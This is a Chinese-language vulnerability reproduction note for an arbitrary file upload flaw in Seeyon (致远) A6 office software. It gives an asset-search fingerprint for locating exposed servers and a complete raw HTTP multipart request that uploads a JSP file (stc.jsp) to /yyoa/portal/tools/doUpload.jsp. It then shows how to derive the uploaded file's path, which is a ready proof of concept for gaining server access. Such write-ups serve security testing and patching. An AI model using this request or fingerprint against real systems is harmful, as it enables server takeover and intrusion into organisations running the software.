登录 白背景

致远A6 uploadForm 任意文件上传漏洞

一、漏洞简介

致远A6 uploadForm 存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。

二、影响版本

  • 致远A6

三、资产测绘

  • hunterweb.body="seeyonDownLoadPic"
  • 特征

1697811470258-f04a7f41-97e4-4dde-b1d3-ce188cf1a0f0.png

四、漏洞复现

POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363639458542274369491015178429
Content-Length: 1508
Connection: close
Cookie: JSESSIONID=CA218004AFAADF7EC35C09307DBF7324; JSESSIONID=D58108CE272DEF63D6638B7614DBDF6F
Upgrade-Insecure-Requests: 1

-----------------------------363639458542274369491015178429
Content-Disposition: form-data; name="myfile"; filename="stc.jsp"
Content-Type: application/octet-stream

test
-----------------------------363639458542274369491015178429--

1700061645849-e5301afd-83ff-46a8-9ee1-567df5f45fe6.png

根据响应拼接上传文件位置

/yyoa/portal/upload/1700061612953.jsp

1700061696484-8cf4a79f-5ef7-4018-b07d-bf10abe98b17.png

原文: https://www.yuque.com/xiaokp7/ocvun2/bhx38agn04pgbczh